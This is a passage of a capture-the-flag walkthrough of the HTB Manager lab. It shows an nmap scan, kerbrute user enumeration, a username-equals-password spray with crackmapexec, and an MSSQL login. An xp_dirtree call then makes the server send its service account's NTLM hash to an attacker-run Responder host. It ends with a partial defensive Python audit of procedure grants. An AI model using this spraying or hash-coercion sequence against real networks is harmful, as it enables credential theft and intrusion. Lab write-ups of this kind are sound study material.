HTB Manager: ESC7 domain privilege escalation

HTB Manager

rustscan -a 10.10.11.236 -- -sV -A -sC  -v -oN manager
# Nmap 7.93 scan initiated Wed Jan 10 14:39:52 2024 as: nmap -vvv -p 53,80,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49674,49675,49673,49733,57721 -sV -A -sC -v -oN manager 10.10.11.236
Nmap scan report for 10.10.11.236
Host is up, received echo-reply ttl 127 (0.66s latency).
Scanned at 2024-01-10 14:39:53 CST for 147s

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Manager
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-01-10 13:39:22Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA/domainComponent=manager
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-30T13:51:28
| Not valid after:  2024-07-29T13:51:28
| MD5:   8f4d67bc2117e4d543e976bd1212b562
| SHA-1: 677995060167b030ce926a31f81c08001c0e29fb
| -----BEGIN CERTIFICATE-----
| MIIGMDCCBRigAwIBAgITXwAAAAnyIQ82Fp4XhwAAAAAACTANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRcwFQYKCZImiZPyLGQBGRYHbWFuYWdl
| cjEYMBYGA1UEAxMPbWFuYWdlci1EQzAxLUNBMB4XDTIzMDczMDEzNTEyOFoXDTI0
| MDcyOTEzNTEyOFowGzEZMBcGA1UEAxMQZGMwMS5tYW5hZ2VyLmh0YjCCASIwDQYJ
| KoZIhvcNAQEBBQADggEPADCCAQoCggEBAK6FZPVxgTeMZrtGt8BkU233VTv/sRli
| qkDCEGRyikhD6pf0MUk6v9l09Gp6nq93/96cpaRR+/kvtWr/YwjrF33GWwQDzkU+
| VBVaOXkCxS4EfuFSEFSnzfkHXmhNHnKFBqZkIkLAxWGMIsfqNhWhOsEnegm8nwRX
| 34iT2Y+evoi/2n/JvH2j/aBRMrHBXCURX6sL9hbdEbcLgxSddmmau3Tfchl0x64I
| wUlGXx50v/WPIQ3o5knB7aYRL7slrZMy/5+d6Li4q87BE5GFg9f7qWSfusV7bdGD
| B0yLyyZ5sRivyTd6rnSISAxLiSs9b+9b6fLUrtKM4JDyarQ86z2j/VUCAwEAAaOC
| Az4wggM6MC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8A
| bABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/
| BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3
| DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjAL
| BglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwTwYJKwYBBAGCNxkCBEIw
| QKA+BgorBgEEAYI3GQIBoDAELlMtMS01LTIxLTQwNzgzODIyMzctMTQ5MjE4Mjgx
| Ny0yNTY4MTI3MjA5LTEwMDAwPAYDVR0RBDUwM6AfBgkrBgEEAYI3GQGgEgQQOm30
| bCF+E0qwNjyE3ccVpoIQZGMwMS5tYW5hZ2VyLmh0YjAdBgNVHQ4EFgQUt2gOEWz4
| cWjj7uIqK6lyCs6KVp8wHwYDVR0jBBgwFoAUOsv0Ls2JyCQ2Zo85WAYOIr8wDkww
| gcoGA1UdHwSBwjCBvzCBvKCBuaCBtoaBs2xkYXA6Ly8vQ049bWFuYWdlci1EQzAx
| LUNBLENOPWRjMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENO
| PVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bWFuYWdlcixEQz1odGI/Y2Vy
| dGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3Ry
| aWJ1dGlvblBvaW50MIHBBggrBgEFBQcBAQSBtDCBsTCBrgYIKwYBBQUHMAKGgaFs
| ZGFwOi8vL0NOPW1hbmFnZXItREMwMS1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5
| JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1tYW5h
| Z2VyLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlm
| aWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsFAAOCAQEACQf6JKTDh+L5K/Vz
| jmyEc8OlzzW4CUrAkJx2OJDoxSiELEMcdsswqBgQR5XtJIUa4iiPZjbepPgWzyZN
| qY5LiuuuLJdmF3GVr39Bc9/dn8LXqYX9npL5UkV0pFyiNcK5bgdRLMra3vXtjNsQ
| 9fos0a0dSM0Z+Pc40tJFLjQ1unn5kkU9uYA/np8z0q5V1GCP2Wqm0/6+OEaZHFQw
| 5j26ZQnOvmTaOmy+TI2Be3+PQNqUgnTODMgHr0IYuPWTy1U8nMR9NhWtdywa07A3
| 5U81h/XKD4e21fDdv4wge+LFubtqzOqOKWXlrOXcfdc7dBdRt+tD3bIcTO63AQFC
| A0xH1Q==
|_-----END CERTIFICATE-----
|_ssl-date: 2024-01-10T13:41:31+00:00; +6h59m20s from scanner time.
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-01-10T13:41:30+00:00; +6h59m20s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA/domainComponent=manager
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-30T13:51:28
| Not valid after:  2024-07-29T13:51:28
| MD5:   8f4d67bc2117e4d543e976bd1212b562
| SHA-1: 677995060167b030ce926a31f81c08001c0e29fb
| -----BEGIN CERTIFICATE-----
| MIIGMDCCBRigAwIBAgITXwAAAAnyIQ82Fp4XhwAAAAAACTANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRcwFQYKCZImiZPyLGQBGRYHbWFuYWdl
| cjEYMBYGA1UEAxMPbWFuYWdlci1EQzAxLUNBMB4XDTIzMDczMDEzNTEyOFoXDTI0
| MDcyOTEzNTEyOFowGzEZMBcGA1UEAxMQZGMwMS5tYW5hZ2VyLmh0YjCCASIwDQYJ
| KoZIhvcNAQEBBQADggEPADCCAQoCggEBAK6FZPVxgTeMZrtGt8BkU233VTv/sRli
| qkDCEGRyikhD6pf0MUk6v9l09Gp6nq93/96cpaRR+/kvtWr/YwjrF33GWwQDzkU+
| VBVaOXkCxS4EfuFSEFSnzfkHXmhNHnKFBqZkIkLAxWGMIsfqNhWhOsEnegm8nwRX
| 34iT2Y+evoi/2n/JvH2j/aBRMrHBXCURX6sL9hbdEbcLgxSddmmau3Tfchl0x64I
| wUlGXx50v/WPIQ3o5knB7aYRL7slrZMy/5+d6Li4q87BE5GFg9f7qWSfusV7bdGD
| B0yLyyZ5sRivyTd6rnSISAxLiSs9b+9b6fLUrtKM4JDyarQ86z2j/VUCAwEAAaOC
| Az4wggM6MC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8A
| bABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/
| BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3
| DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjAL
| BglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwTwYJKwYBBAGCNxkCBEIw
| QKA+BgorBgEEAYI3GQIBoDAELlMtMS01LTIxLTQwNzgzODIyMzctMTQ5MjE4Mjgx
| Ny0yNTY4MTI3MjA5LTEwMDAwPAYDVR0RBDUwM6AfBgkrBgEEAYI3GQGgEgQQOm30
| bCF+E0qwNjyE3ccVpoIQZGMwMS5tYW5hZ2VyLmh0YjAdBgNVHQ4EFgQUt2gOEWz4
| cWjj7uIqK6lyCs6KVp8wHwYDVR0jBBgwFoAUOsv0Ls2JyCQ2Zo85WAYOIr8wDkww
| gcoGA1UdHwSBwjCBvzCBvKCBuaCBtoaBs2xkYXA6Ly8vQ049bWFuYWdlci1EQzAx
| LUNBLENOPWRjMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENO
| PVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bWFuYWdlcixEQz1odGI/Y2Vy
| dGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3Ry
| aWJ1dGlvblBvaW50MIHBBggrBgEFBQcBAQSBtDCBsTCBrgYIKwYBBQUHMAKGgaFs
| ZGFwOi8vL0NOPW1hbmFnZXItREMwMS1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5
| JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1tYW5h
| Z2VyLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlm
| aWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsFAAOCAQEACQf6JKTDh+L5K/Vz
| jmyEc8OlzzW4CUrAkJx2OJDoxSiELEMcdsswqBgQR5XtJIUa4iiPZjbepPgWzyZN
| qY5LiuuuLJdmF3GVr39Bc9/dn8LXqYX9npL5UkV0pFyiNcK5bgdRLMra3vXtjNsQ
| 9fos0a0dSM0Z+Pc40tJFLjQ1unn5kkU9uYA/np8z0q5V1GCP2Wqm0/6+OEaZHFQw
| 5j26ZQnOvmTaOmy+TI2Be3+PQNqUgnTODMgHr0IYuPWTy1U8nMR9NhWtdywa07A3
| 5U81h/XKD4e21fDdv4wge+LFubtqzOqOKWXlrOXcfdc7dBdRt+tD3bIcTO63AQFC
| A0xH1Q==
|_-----END CERTIFICATE-----
1433/tcp  open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-01-10T13:41:32+00:00; +6h59m20s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-05T09:54:50
| Not valid after:  2054-01-05T09:54:50
| MD5:   ba08f66f89cc9b7ceda27627f4a05866
| SHA-1: ff3fa587332dad8350581444392e3bb1ec5debea
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQFWjMmWgxqblIbdBNZ95BYzANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjQwMTA1MDk1NDUwWhgPMjA1NDAxMDUwOTU0NTBaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBANc3kLMz
| zmSWiflCzRPDE2OUbhiwvVA93WsmGvXWAsuXXFJ6a7mMlHaozhQ3zQIUgogA/WQ1
| YWJnd2nKdeWABKEBt30hA8z+Km6qz9l8BuhPkjwZFJi+awyBetbyEgayTe7P6gzD
| EIMbiCFxw1Zvycmd5PsMPCYfCNIpXjYL8zWQX+f5rHTLwtkJOeBa+AkouLYDeAgl
| rezc1aJtrRt8Jo087SaQH7wahB+ifFQSjYvTIc7kO7XZdNJHE19FdBCWGSs2Bb7C
| ++abGrBLSHrkxHsJWOFvdmO0hxqboUmJmYcHcP7tye+ewBo/6x87pzQtbADyvcEC
| yOcvHtSbnBStAdkCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAM7Aj3YpY1xOsRtwN
| DI9v4yaBA7QQ0kVDcRniIolWJE1QO8mJbXX4+Ev/9VPKHyl+2bO6/vpvL/uO18mH
| zFk1B7iC963EWUqDI/nd1Jy4L0NTg6PLkVW8ojf59l+colS0EsCIREI7YEOKH6oE
| +syTPXZPetgPnX1opLcqHOgVp+UFha4cwZWOD8DNQvAvobmMUJdqpi0t3Pi1xsfq
| Ye8nofpSAm6UEAjktZjMAbev6lNP9QaYxkdlV2IsaIhHpQeGVyj2sooNrt/dximS
| deOBmHZd9v1fJ8GQUMqJwjHxybeOGfp50xxjgbbailk8+CfMRisx8aw83K5wqqOE
| 7pb3Yw==
|_-----END CERTIFICATE-----
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA/domainComponent=manager
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-30T13:51:28
| Not valid after:  2024-07-29T13:51:28
| MD5:   8f4d67bc2117e4d543e976bd1212b562
| SHA-1: 677995060167b030ce926a31f81c08001c0e29fb
| -----BEGIN CERTIFICATE-----
| MIIGMDCCBRigAwIBAgITXwAAAAnyIQ82Fp4XhwAAAAAACTANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRcwFQYKCZImiZPyLGQBGRYHbWFuYWdl
| cjEYMBYGA1UEAxMPbWFuYWdlci1EQzAxLUNBMB4XDTIzMDczMDEzNTEyOFoXDTI0
| MDcyOTEzNTEyOFowGzEZMBcGA1UEAxMQZGMwMS5tYW5hZ2VyLmh0YjCCASIwDQYJ
| KoZIhvcNAQEBBQADggEPADCCAQoCggEBAK6FZPVxgTeMZrtGt8BkU233VTv/sRli
| qkDCEGRyikhD6pf0MUk6v9l09Gp6nq93/96cpaRR+/kvtWr/YwjrF33GWwQDzkU+
| VBVaOXkCxS4EfuFSEFSnzfkHXmhNHnKFBqZkIkLAxWGMIsfqNhWhOsEnegm8nwRX
| 34iT2Y+evoi/2n/JvH2j/aBRMrHBXCURX6sL9hbdEbcLgxSddmmau3Tfchl0x64I
| wUlGXx50v/WPIQ3o5knB7aYRL7slrZMy/5+d6Li4q87BE5GFg9f7qWSfusV7bdGD
| B0yLyyZ5sRivyTd6rnSISAxLiSs9b+9b6fLUrtKM4JDyarQ86z2j/VUCAwEAAaOC
| Az4wggM6MC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8A
| bABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/
| BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3
| DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjAL
| BglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwTwYJKwYBBAGCNxkCBEIw
| QKA+BgorBgEEAYI3GQIBoDAELlMtMS01LTIxLTQwNzgzODIyMzctMTQ5MjE4Mjgx
| Ny0yNTY4MTI3MjA5LTEwMDAwPAYDVR0RBDUwM6AfBgkrBgEEAYI3GQGgEgQQOm30
| bCF+E0qwNjyE3ccVpoIQZGMwMS5tYW5hZ2VyLmh0YjAdBgNVHQ4EFgQUt2gOEWz4
| cWjj7uIqK6lyCs6KVp8wHwYDVR0jBBgwFoAUOsv0Ls2JyCQ2Zo85WAYOIr8wDkww
| gcoGA1UdHwSBwjCBvzCBvKCBuaCBtoaBs2xkYXA6Ly8vQ049bWFuYWdlci1EQzAx
| LUNBLENOPWRjMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENO
| PVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bWFuYWdlcixEQz1odGI/Y2Vy
| dGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3Ry
| aWJ1dGlvblBvaW50MIHBBggrBgEFBQcBAQSBtDCBsTCBrgYIKwYBBQUHMAKGgaFs
| ZGFwOi8vL0NOPW1hbmFnZXItREMwMS1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5
| JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1tYW5h
| Z2VyLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlm
| aWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsFAAOCAQEACQf6JKTDh+L5K/Vz
| jmyEc8OlzzW4CUrAkJx2OJDoxSiELEMcdsswqBgQR5XtJIUa4iiPZjbepPgWzyZN
| qY5LiuuuLJdmF3GVr39Bc9/dn8LXqYX9npL5UkV0pFyiNcK5bgdRLMra3vXtjNsQ
| 9fos0a0dSM0Z+Pc40tJFLjQ1unn5kkU9uYA/np8z0q5V1GCP2Wqm0/6+OEaZHFQw
| 5j26ZQnOvmTaOmy+TI2Be3+PQNqUgnTODMgHr0IYuPWTy1U8nMR9NhWtdywa07A3
| 5U81h/XKD4e21fDdv4wge+LFubtqzOqOKWXlrOXcfdc7dBdRt+tD3bIcTO63AQFC
| A0xH1Q==
|_-----END CERTIFICATE-----
|_ssl-date: 2024-01-10T13:41:31+00:00; +6h59m20s from scanner time.
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA/domainComponent=manager
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-30T13:51:28
| Not valid after:  2024-07-29T13:51:28
| MD5:   8f4d67bc2117e4d543e976bd1212b562
| SHA-1: 677995060167b030ce926a31f81c08001c0e29fb
| -----BEGIN CERTIFICATE-----
| MIIGMDCCBRigAwIBAgITXwAAAAnyIQ82Fp4XhwAAAAAACTANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRcwFQYKCZImiZPyLGQBGRYHbWFuYWdl
| cjEYMBYGA1UEAxMPbWFuYWdlci1EQzAxLUNBMB4XDTIzMDczMDEzNTEyOFoXDTI0
| MDcyOTEzNTEyOFowGzEZMBcGA1UEAxMQZGMwMS5tYW5hZ2VyLmh0YjCCASIwDQYJ
| KoZIhvcNAQEBBQADggEPADCCAQoCggEBAK6FZPVxgTeMZrtGt8BkU233VTv/sRli
| qkDCEGRyikhD6pf0MUk6v9l09Gp6nq93/96cpaRR+/kvtWr/YwjrF33GWwQDzkU+
| VBVaOXkCxS4EfuFSEFSnzfkHXmhNHnKFBqZkIkLAxWGMIsfqNhWhOsEnegm8nwRX
| 34iT2Y+evoi/2n/JvH2j/aBRMrHBXCURX6sL9hbdEbcLgxSddmmau3Tfchl0x64I
| wUlGXx50v/WPIQ3o5knB7aYRL7slrZMy/5+d6Li4q87BE5GFg9f7qWSfusV7bdGD
| B0yLyyZ5sRivyTd6rnSISAxLiSs9b+9b6fLUrtKM4JDyarQ86z2j/VUCAwEAAaOC
| Az4wggM6MC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8A
| bABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/
| BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3
| DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjAL
| BglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwTwYJKwYBBAGCNxkCBEIw
| QKA+BgorBgEEAYI3GQIBoDAELlMtMS01LTIxLTQwNzgzODIyMzctMTQ5MjE4Mjgx
| Ny0yNTY4MTI3MjA5LTEwMDAwPAYDVR0RBDUwM6AfBgkrBgEEAYI3GQGgEgQQOm30
| bCF+E0qwNjyE3ccVpoIQZGMwMS5tYW5hZ2VyLmh0YjAdBgNVHQ4EFgQUt2gOEWz4
| cWjj7uIqK6lyCs6KVp8wHwYDVR0jBBgwFoAUOsv0Ls2JyCQ2Zo85WAYOIr8wDkww
| gcoGA1UdHwSBwjCBvzCBvKCBuaCBtoaBs2xkYXA6Ly8vQ049bWFuYWdlci1EQzAx
| LUNBLENOPWRjMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENO
| PVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bWFuYWdlcixEQz1odGI/Y2Vy
| dGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3Ry
| aWJ1dGlvblBvaW50MIHBBggrBgEFBQcBAQSBtDCBsTCBrgYIKwYBBQUHMAKGgaFs
| ZGFwOi8vL0NOPW1hbmFnZXItREMwMS1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5
| JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1tYW5h
| Z2VyLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlm
| aWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsFAAOCAQEACQf6JKTDh+L5K/Vz
| jmyEc8OlzzW4CUrAkJx2OJDoxSiELEMcdsswqBgQR5XtJIUa4iiPZjbepPgWzyZN
| qY5LiuuuLJdmF3GVr39Bc9/dn8LXqYX9npL5UkV0pFyiNcK5bgdRLMra3vXtjNsQ
| 9fos0a0dSM0Z+Pc40tJFLjQ1unn5kkU9uYA/np8z0q5V1GCP2Wqm0/6+OEaZHFQw
| 5j26ZQnOvmTaOmy+TI2Be3+PQNqUgnTODMgHr0IYuPWTy1U8nMR9NhWtdywa07A3
| 5U81h/XKD4e21fDdv4wge+LFubtqzOqOKWXlrOXcfdc7dBdRt+tD3bIcTO63AQFC
| A0xH1Q==
|_-----END CERTIFICATE-----
|_ssl-date: 2024-01-10T13:41:30+00:00; +6h59m19s from scanner time.
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49673/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49675/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49733/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
57721/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=1/10%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=659E3C4C%P=x86_64-pc-linux-gnu)
SEQ(SP=108%GCD=1%ISR=10B%TI=I%II=I%SS=S%TS=U)
OPS(O1=M53ANW8NNS%O2=M53ANW8NNS%O3=M53ANW8%O4=M53ANW8NNS%O5=M53ANW8NNS%O6=M53ANNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M53ANW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 61285/tcp): CLEAN (Timeout)
|   Check 2 (port 4401/tcp): CLEAN (Timeout)
|   Check 3 (port 12164/udp): CLEAN (Timeout)
|   Check 4 (port 63406/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 6h59m19s, deviation: 0s, median: 6h59m19s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-01-10T13:40:52
|_  start_date: N/A

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   722.92 ms 10.10.16.1
2   722.95 ms 10.10.11.236

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 10 14:42:20 2024 -- 1 IP address (1 host up) scanned in 148.08 seconds

This is a domain controller:

DNS:dc01.manager.htb

SMB (file sharing and network printing) is open:

445/tcp  open  microsoft-ds?

MS SQL Server is also running:

1433/tcp  open  ms-sql-s

Use kerbrute to enumerate domain users:

kerbrute userenum -d manager.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.11.236


Enumeration takes a long time; the usernames it found are listed below.

ryan
guest
cheng
raven
administrator
Ryan
Raven
operator
Guest
Administrator
Cheng
jinwoo
RYAN
RAVEN
GUEST
Operator

Brute-forcing the administrator user with kerbrute found nothing. The administrator account usually has no bad-password lockout threshold, but brute-forcing it directly is still not recommended, because it leaves entries in the security log.


Put the usernames into users.txt and use crackmapexec to test passwords identical to the usernames:

crackmapexec smb manager.htb -u users.txt -p users.txt


This finds that operator's password is the same as the username.

Connect with mssqlclient:

impacket-mssqlclient -windows-auth manager.htb/operator:operator@10.10.11.236

Check whether the account has permission to execute these extended stored procedures:

USE master;

EXEC sp_helprotect 'xp_dirtree';    -- lists the subdirectories of a directory

EXEC sp_helprotect 'xp_subdirs';    -- lists the directories under a given directory

EXEC sp_helprotect 'xp_fileexist';  -- checks whether a file exists


Start a rogue server with Responder. When MSSQL connects to it, it sends the service account's credentials (a Net-NTLM hash); that hash can then be cracked and used to log in to MSSQL with the highest privileges.

responder -I tun0 -i 10.10.16.24


Use xp_dirtree to make the server access the rogue share:

xp_dirtree '\\10.10.16.24\test'


A hash was obtained, but cracking it failed; the following steps are not screenshotted.
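The sp_helprotect output above is what decides whether this coercion works at all: xp_dirtree, xp_subdirs and xp_fileexist take a path argument, and on a stock SQL Server EXECUTE on them is granted to public, so any login can point the service account at a UNC share. The Python below is an added example, not code from the writeup, that evaluates constructed rows in the shape sp_helprotect returns (Grant minus Deny) and emits the REVOKE statements a DBA would apply. The column names mirror sp_helprotect's output; the rows themselves are constructed, not real output from the box.

```python
"""Audit which principals can EXECUTE the UNC-capable extended stored procedures
and produce the REVOKE statements that close the credential-leak path.

Added example, not part of the original writeup. SAMPLE_ROWS is constructed in
the column layout of sp_helprotect (Owner, Object, Grantee, Grantor,
ProtectType, Action, Column); it is not real output from the target.
"""
from collections import namedtuple

Row = namedtuple("Row", "owner obj grantee grantor protect_type action column")

# Constructed rows: the default grant to public on three procedures, one of them
# already hardened with an explicit DENY, plus an unrelated grant for contrast.
SAMPLE_ROWS = [
    Row("dbo", "xp_dirtree",   "public",   "dbo", "Grant", "Execute", "."),
    Row("dbo", "xp_subdirs",   "public",   "dbo", "Grant", "Execute", "."),
    Row("dbo", "xp_fileexist", "public",   "dbo", "Grant", "Execute", "."),
    Row("dbo", "xp_fileexist", "public",   "dbo", "Deny",  "Execute", "."),  # DENY overrides GRANT
    Row("dbo", "xp_cmdshell",  "sqlagent", "dbo", "Grant", "Execute", "."),
]

# Procedures whose path argument may be a UNC share, i.e. can make the service
# account authenticate outbound to an arbitrary host.
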